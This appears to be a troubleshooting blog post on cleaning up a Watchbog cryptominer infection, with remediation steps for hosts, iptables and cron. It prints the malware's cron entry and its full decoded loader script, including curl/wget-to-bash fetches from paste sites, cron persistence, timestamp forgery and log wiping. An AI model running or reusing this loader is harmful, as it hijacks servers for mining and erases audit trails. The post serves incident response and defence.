Troubleshooting a Watchbog cryptomining infection


Chapter 1: The situation

1) The server raised a CPU alarm: CPU usage was at 100%. Logging in showed a single process named watchbog consuming all of the CPU (screenshot not reproduced here).

2) It could not be killed for good: after a kill it came back a short while later, which is a clear sign that something scheduled was restarting it. Sure enough, the system's cron had been tampered with, as shown below:

*/9 * * * * (curl -fsSL https://pastebin.com/raw/AgdgACUD||wget -q -O- https://pastebin.com/raw/AgdgACUD||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvwxG8").read()'||curl -fsSL https://gitee.com/return_block/party_1/raw/master/main/api/README.md||wget -q -O - https://gitee.com/return_block/party_1/raw/master/main/api/README.md||curl -fsSL https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt)|bash

Opening that URL returns what looks like a blob of base64 text (with further URLs inside it in the same form). Decoding it with base64 gives the script below:

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the TnF job copy
 
function system() {
    rm -rf /bin/httpntp
    grep -v "/bin/httpntp" /etc/crontab > /etc/crontab.bak && mv /etc/crontab.bak /etc/crontab
    if [ ! -f "/bin/httpntp" ]; then
        curl -fsSL https://pastebin.com/raw/3XEzey2T -o /bin/httpntp && chmod 755 /bin/httpntp
        if [ ! -f "/bin/httpntp" ]; then
            wget  https://pastebin.com/raw/3XEzey2T -O /bin/httpntp && chmod 755 /bin/httpntp
        fi
        if [ ! -f "/etc/crontab" ]; then
            echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
        else
            echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
        fi
    fi
}
 
function dragon() {
    nohup python -c "import base64;exec(base64.b64decode('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'))" >/dev/null 2>&1 &
    touch /tmp/.tmpza
}
 
function cronhigh() {
    chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
    rm -rf /etc/cron.hourly/Anacron /etc/cron.daily/Anacron /etc/cron.monthly/Anacron
    echo -e "*/3 * * * * root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/root
    echo -e "*/5 * * * * root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/system
    echo -e "*/7 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo -e "*/9 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/crontabs/root
    mkdir -p /etc/cron.hourly
    curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron
    if [ ! -f "/etc/cron.hourly/Anacron" ]; then
        wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron
    fi
    mkdir -p /etc/cron.daily
    curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron
    if [ ! -f "/etc/cron.daily/Anacron" ]; then
        wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron
    fi
    mkdir -p /etc/cron.monthly
    curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron
    if [ ! -f "/etc/cron.monthly/Anacron" ]; then
        wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron
    fi
    touch -acmr /bin/sh /var/spool/cron/root
    touch -acmr /bin/sh /var/spool/cron/crontabs/root
    touch -acmr /bin/sh /etc/cron.d/system
    touch -acmr /bin/sh /etc/cron.d/root
    touch -acmr /bin/sh /etc/cron.hourly/Anacron
    touch -acmr /bin/sh /etc/cron.daily/Anacron
    touch -acmr /bin/sh /etc/cron.monthly/Anacron
}
 
function cronlow() {
    cr=$(crontab -l | grep -q "https://pastebin.com/raw/3XEzey2T" | wc -l)
    if [ ${cr} -eq 0 ];then
        echo "Cron dosen't exists"
        crontab -r
        (crontab -l 2>/dev/null; echo "*/1 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash > /dev/null 2>&1")| crontab -
    else
        echo "Cron exists"
    fi
}
 
function downloadlow() {
    pa=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
    if [ ${pa} -eq 0 ];then
        mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
        rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/*
        if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json" ]; then
            curl -fsSL https://ptpb.pw/WpNh | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json" ]; then
                wget https://ptpb.pw/WpNh -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json
            fi
        fi
        ARCH=$(uname -m)
        if [ "$ARCH" == "x86_64" ]; then
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                curl -fsSL https://ptpb.pw/D8r9 -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                    wget https://ptpb.pw/D8r9 -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                fi
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        elif [ "$ARCH" == "i686" ]; then
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                    wget https://pixeldra.in/api/download/nZ2s4L -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                fi
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        else
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                    wget https://pixeldra.in/api/download/nZ2s4L -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                fi
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        fi
    fi
}
 
function downloadhigh() {
    pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
    if [ ${pb} -eq 0 ];then
        rm -rf /bin/config.json /bin/watchbog
        if [ ! -f "/bin/config.json" ]; then
            curl -fsSL https://ptpb.pw/WpNh | base64 -d >  /bin/config.json && chmod 777 /bin/config.json
            if [ ! -f "/bin/config.json" ]; then
                wget https://ptpb.pw/WpNh -O - | base64 -d > /bin/config.json && chmod 777 /bin/config.json
            fi
        fi
        ARCH=$(uname -m)
        if [ "$ARCH" == "x86_64" ]; then
            if [ ! -f "/bin/watchbog" ]; then
                curl -fsSL https://ptpb.pw/D8r9 -o /bin/watchbog && chmod 777 /bin/watchbog
                if [ ! -f "/bin/watchbog" ]; then
                    wget https://ptpb.pw/D8r9 -O /bin/watchbog && chmod 777 /bin/watchbog
                fi
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        elif [ "$ARCH" == "i686" ]; then
            if [ ! -f "/bin/watchbog" ]; then
                curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /bin/watchbog && chmod 777 /bin/watchbog
                if [ ! -f "/bin/watchbog" ]; then
                    wget https://pixeldra.in/api/download/nZ2s4L -O /bin/watchbog && chmod 777 /bin/watchbog
                fi
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        else
            if [ ! -f "/bin/watchbog" ]; then
                curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /bin/watchbog && chmod 777 /bin/watchbog
                if [ ! -f "/bin/watchbog" ]; then
                    wget https://pixeldra.in/api/download/nZ2s4L -O /bin/watchbog && chmod 777 /bin/watchbog
                fi
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        fi
    fi
}
 
 
function testhigh() {
    pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
    if [ ${pb} -eq 0 ];then
        rm -rf /bin/watchbog /bin/config.json
        if [ ! -f "/bin/config.txt" ]; then
            curl -fsSL https://ptpb.pw/KAlo | base64 -d > /bin/config.txt && chmod 777 /bin/config.txt
            if [ ! -f "/bin/config.txt" ]; then
                wget https://ptpb.pw/KAlo -O - | base64 -d > /bin/config.txt && chmod 777 /bin/config.txt
            fi
        fi
        if [ ! -f "/bin/cpu.txt" ]; then
            curl -fsSL https://ptpb.pw/Nqo- | base64 -d > /bin/cpu.txt && chmod 777 /bin/cpu.txt
            if [ ! -f "/bin/cpu.txt" ]; then
                wget https://ptpb.pw/Nqo- -O - | base64 -d > /bin/cpu.txt && chmod 777 /bin/cpu.txt
            fi
        fi
        if [ ! -f "/bin/pools.txt" ]; then
            curl -fsSL https://ptpb.pw/9Lyg | base64 -d >  /bin/pools.txt && chmod 777 /bin/pools.txt
            if [ ! -f "/bin/pools.txt" ]; then
                wget https://ptpb.pw/9Lyg -O - | base64 -d > /bin/pools.txt && chmod 777 /bin/pools.txt
            fi
        fi
        ARCH=$(uname -m)
        if [ "$ARCH" == "x86_64" ]; then
            if [ ! -f "/bin/watchbog" ]; then
                curl -fsSL https://ptpb.pw/mNJt -o /bin/watchbog && chmod 777 /bin/watchbog
                if [ ! -f "/bin/watchbog" ]; then
                    wget https://ptpb.pw/mNJt -O /bin/watchbog && chmod 777 /bin/watchbog
                fi
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        else
            rm -rf /bin/cpu.txt /bin/pools.txt /bin/config.txt 
        fi
    fi
}
 
function testlow() {
    pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
    if [ ${pb} -eq 0 ];then
        mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
        rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/*
        if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt" ]; then
            curl -fsSL https://ptpb.pw/KAlo | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt" ]; then
                wget https://ptpb.pw/KAlo -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
            fi
        fi
        if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt" ]; then
            curl -fsSL https://ptpb.pw/Nqo- | base64 -d >  /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt" ]; then
                wget https://ptpb.pw/Nqo- -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt
            fi
        fi
        if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt" ]; then
            curl -fsSL https://ptpb.pw/9Lyg | base64 -d >  /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt" ]; then
                wget https://ptpb.pw/9Lyg -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt
            fi
        fi
        ARCH=$(uname -m)
        if [ "$ARCH" == "x86_64" ]; then
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                curl -fsSL https://ptpb.pw/mNJt -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                    wget https://ptpb.pw/mNJt -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                fi
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        else
            rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt 
        fi
    fi
}
 
function successhigh() {
    (curl -fsSL https://pastebin.com/raw/eCZwXCiK || wget -q -O - https://pastebin.com/raw/eCZwXCiK)
    touch /tmp/.tmpc
}    
 
function successlow() {
    (curl -fsSL https://pastebin.com/raw/fMXdbHRs || wget -q -O - https://pastebin.com/raw/fMXdbHRs)
    touch /tmp/.tmpc
}
 
function elevate() {
    ARCH=$(uname -m)
    if [ "$ARCH" == "x86_64" ]; then
        echo "The Arch Is Supported lets GO On"
        python -V >/dev/null 2>&1
        if [ "$?" = "0" ]; then
            echo "Python Is Avalaible lets GO On"
            python -c "import base64;exec(base64.b64decode('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'))" >/dev/null 2>&1
        else
            cronlow
            downloadlow
        fi
        sleep 30
        if [ ! -f "/tmp/activate" ]; then
            echo "I guess The Exploit worked"
            pmp=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
            if [ ${pmp} -ne 0 ];then
                pup=$(ps auxf | grep 'watchbog' | grep -v grep | awk '{print $1}')
                if [ "$pup" == "root" ];then
                    echo "The Exploit worked Successfully"
                    echo "Hahahahha"
                    rm -rf /tmp/elevate
                    cronlow
                    exit 0
                else
                    cronlow
                    downloadlow
                fi
            else
                cronlow
                downloadlow
            fi
        else
            rm -rf /tmp/elevate
            rm -rf /tmp/activate
            cronlow
            downloadlow
        fi
    else
        cronlow
        downloadlow
    fi
}
 
 
update=$( (curl -fsSL --max-time 120 https://pastebin.com/raw/2unJiD3b) )
if [ "$update" == "update"x ];then
    echo "An update exists boss"
    rm -rf /tmp/.tmpza
    if [ ! -f "/tmp/.tmpold" ]; then
        spreada
    fi
else
    echo "NO update exists boss"
fi
BS=$( whoami )
echo "I am $BS"
if [ ! -f "/tmp/.tmpnewasss" ]; then
    touch /tmp/.tmpnewasss
    rm /tmp/.tmpnewzz
    ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
    pkill -f watchbog
fi
if [ "$BS" != "root" ];then
    if [ ! -f "/tmp/.tmpleve" ]; then
        crontab -r
        ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
        pkill -f watchbog
    fi
    ps -fe|grep 'watchbog'|grep -v grep|wc -l
    if [ $? -ne 0 ];then
        echo "It's running boss"
        crontab -r 
        cronlow
    else
        if [ ! -f "/tmp/.tmpleve" ]; then
            rm -rf /tmp/.tmpelev
            touch /tmp/.tmpleve
            elevate
        else
            downloadlow
        fi
        cronlow
        sleep 15
        if [ ${pm} -eq 0 ];then
            testlow
        fi
        pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
        if [ ${pm} -ne 0 ];then
            if [ ! -f "/tmp/.tmpc" ]; then
                successlow
            fi
        fi
    fi
fi
if [ "$BS" == "root" ];then
    ps -fe|grep 'watchbog'|grep -v grep|wc -l
    if [ $? -ne 0 ];then
        echo "It's running boss"
        system
        cronhigh
        downloadhigh
    else
        system
        cronhigh
        downloadhigh
        sleep 15
        pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
        if [ ${pm} -ne 0 ];then
            if [ ! -f "/tmp/.tmpc" ]; then
                successhigh
            fi
        fi
        sleep 30
        if [ ${pm} -eq 0 ];then
            testhigh
            if [ ${pm} -ne 0 ];then
                successhigh
            fi
        fi
        if [ ${pm} -eq 0 ];then
            downloadlow
            if [ ${pm} -ne 0 ];then
                successlow
            fi
        fi
        if [ ${pm} -eq 0 ];then
            testlow
            if [ ${pm} -ne 0 ];then
                successlow
            fi
        fi
        
    fi
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
    sed -i '/pastebin/d' /var/log/syslog 
    sed -i '/github/d' /var/log/syslog
    echo 0>/var/spool/mail/root
fi
(End of the decoded script.)

3) After we removed the cron entries, exactly the same content was written back a little later, so this is not an ordinary piece of malware.

4) We later learned that the watchbog process is an implanted cryptominer. It writes jobs under cron that periodically download the trojan from pastebin.com and start mining; if it is not removed completely it keeps restarting, which harms the system and disrupts the other services running on it.

5) While cleaning up the watchbog mining process, I initially contained the process but, owing to my limited skills, did not remove it completely. Because it was not fully removed, the RabbitMQ service running on the same system crashed every day. At first I kept studying the RabbitMQ error logs and wasted a lot of time; later, by correlating the times RabbitMQ went down with the system's scheduled tasks, I found that the leftover watchbog process was what was disrupting RabbitMQ.

Chapter 2: Remediation

2.1 Edit /etc/hosts

Looking at the cron entry and the decoded script, we can pick out several malicious hosts:

1)          ptpb.pw

2)          pastebin.com

3)          gitee.com

4)          aziplcr72qjhzvin.onion.to

(The decoded script also fetches the 32-bit binary from pixeldra.in; treat that host the same way.)

As a first step we can sinkhole these names to localhost. Be clear about what this does and does not do: it only affects name resolution on this host, so it does not stop the miner from connecting to the hard-coded pool IP addresses seen in the strace output in 2.2, and it also breaks any legitimate use of pastebin.com and gitee.com from this machine.

[root@localhost ~]# cat /etc/hosts
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
127.0.0.1   ptpb.pw pastebin.com  gitee.com  aziplcr72qjhzvin.onion.to
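Pulling the indicators out of the cron entry and decoding the staged payload can be scripted rather than done by hand. The following is an added example and not code from the original post: it extracts the URLs and hostnames from the cron line quoted in chapter 1 (embedded below as sample input), emits the matching /etc/hosts sinkhole lines, and peels the nested base64 / exec(base64.b64decode(...)) layers that the decoded script uses for its Python stagers. The actual stager blob from the post is not included; the function is written for that layout and works on any script that follows it.

```shell
#!/bin/sh
# Added example (not part of the original post): indicator extraction and
# payload decoding for a "curl ... | bash" cron loader.

# Sample input: the cron entry shown in chapter 1, verbatim.
CRON_LINE=$(cat <<'EOF'
*/9 * * * * (curl -fsSL https://pastebin.com/raw/AgdgACUD||wget -q -O- https://pastebin.com/raw/AgdgACUD||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvwxG8").read()'||curl -fsSL https://gitee.com/return_block/party_1/raw/master/main/api/README.md||wget -q -O - https://gitee.com/return_block/party_1/raw/master/main/api/README.md||curl -fsSL https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt)|bash
EOF
)

# Unique download URLs on stdin (pastebin IDs, gitee paths, .onion.to mirrors)
extract_urls() { grep -oE 'https?://[A-Za-z0-9./_-]+' | sort -u; }

# Unique hostnames on stdin: what to sinkhole in /etc/hosts and what to
# resolve when writing the iptables rules in 2.2
extract_hosts() { extract_urls | sed -E 's|^https?://||; s|/.*$||' | sort -u; }

# /etc/hosts lines pinning every hostname on stdin to 127.0.0.1
hosts_sinkhole() { extract_hosts | sed 's|^|127.0.0.1   |'; }

# Decode a staged payload. The paste body in the post is base64 of a bash
# script, and that script carries Python stagers of the form
#   exec(base64.b64decode('...'))
# nested inside one another. Decode the outer layer if the input is pure
# base64, then keep peeling b64decode('...') literals until none is left.
# Prints the innermost plaintext; the number of layers goes to stderr.
peel_b64_layers() {
  data="$1"
  depth=0
  if ! printf '%s' "$data" | grep -qvE '^[A-Za-z0-9+/=]*$'; then
    # every line is base64 text: this is the raw paste, decode it first
    data=$(printf '%s' "$data" | base64 -d 2>/dev/null) || return 1
    depth=1
  fi
  while :; do
    blob=$(printf '%s' "$data" | sed -nE "s|.*b64decode\('([A-Za-z0-9+/=]+)'\).*|\1|p" | head -n 1)
    [ -n "$blob" ] || break
    data=$(printf '%s' "$blob" | base64 -d 2>/dev/null) || break
    depth=$((depth + 1))
  done
  echo "layers decoded: $depth" >&2
  printf '%s\n' "$data"
}

if [ "${1:-}" = "--demo" ]; then
  printf '%s\n' "$CRON_LINE" | extract_urls
  printf '%s\n' "$CRON_LINE" | hosts_sinkhole
fi
```

Run it with `--demo` to list the four distinct URLs and the three hostnames in the cron line; feed a downloaded paste to `peel_b64_layers "$(cat paste.txt)"` to get at the innermost stager without executing anything. Decoding stops at the first layer that is not valid base64, so a stager that is built by string concatenation rather than a single literal will need to be unpacked by hand from that point.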

2.2 Block inbound and outbound traffic with the firewall

We block the IP addresses that the attacker's domains resolve to.

For example, pastebin.com resolved to 104.20.208.21 and 104.20.209.21 (it sits behind Cloudflare and resolves to several addresses; resolve it from the affected host and add a rule pair for every address returned):

iptables -A INPUT -s 104.20.209.21 -j DROP
iptables -A OUTPUT -d 104.20.209.21 -j DROP

The OUTPUT rule must match on the destination (-d). An OUTPUT rule written with -s compares against the local source address, never matches, and leaves the download unblocked.

Save the rules:

/sbin/service iptables save

To be safe, block the IP addresses of the other domains the same way. In addition, attaching strace to the watchbog process showed it repeatedly connecting to a couple of addresses on port 3333, a port commonly used by mining pools; block those as well.

[root@localhost ~]# strace -p 3738 ## attach strace to the watchbog main process
strace: Process 3738 attached
(omitted)
connect(11, {sa_family=AF_INET, sin_port=htons(3333), sin_addr=inet_addr("185.92.222.223")}, 16) = -1 EINPROGRESS (Operation now in progress)
(omitted)
connect(11, {sa_family=AF_INET, sin_port=htons(3333), sin_addr=inet_addr("185.92.222.223")}, 16) = -1 EINPROGRESS (Operation now in progress)
(omitted)
connect(11, {sa_family=AF_INET, sin_port=htons(3333), sin_addr=inet_addr("178.128.242.134")}, 16) = -1 EINPROGRESS (Operation now in progress)

2.3 Rename curl and wget

Because the miner relies on curl and wget to download its payloads, the first thing to do is take them out of the loader's reach:

mv /usr/bin/curl /usr/bin/lruc
mv /usr/bin/wget /usr/bin/tegw

Two caveats. The cron entry above falls back to Python's urllib2 when curl and wget fail, so renaming them slows the loader down but does not stop it on its own. Renaming them also breaks yum and any legitimate scripts that call them, so move them back once the cleanup is confirmed. If the malware has already been confirmed fully removed, this step is not needed.

2.4 Delete the related cron entries

crontab -l
/etc/cron.d     
/etc/cron.deny    
/etc/cron.monthly  
/etc/cron.daily  
/etc/cron.hourly  
/etc/crontab       
/etc/cron.weekly

All eight of these cron-related files and directories must be gone through carefully; anything referencing curl, pastebin.com and the like must be removed completely. Three things the decoded script does are worth keeping in mind while doing so. crontab -l only shows the current user's spool entry, but the script also writes /var/spool/cron/root and /var/spool/cron/crontabs/root directly, so check those files too. It runs chattr -i on its cron files before rewriting them, which means they may carry the immutable attribute; if an entry refuses to be deleted, check lsattr and clear the attribute first. And it copies the timestamps of /bin/sh onto every file it writes (touch -acmr /bin/sh ...), so do not rely on modification times to decide which files are recent.
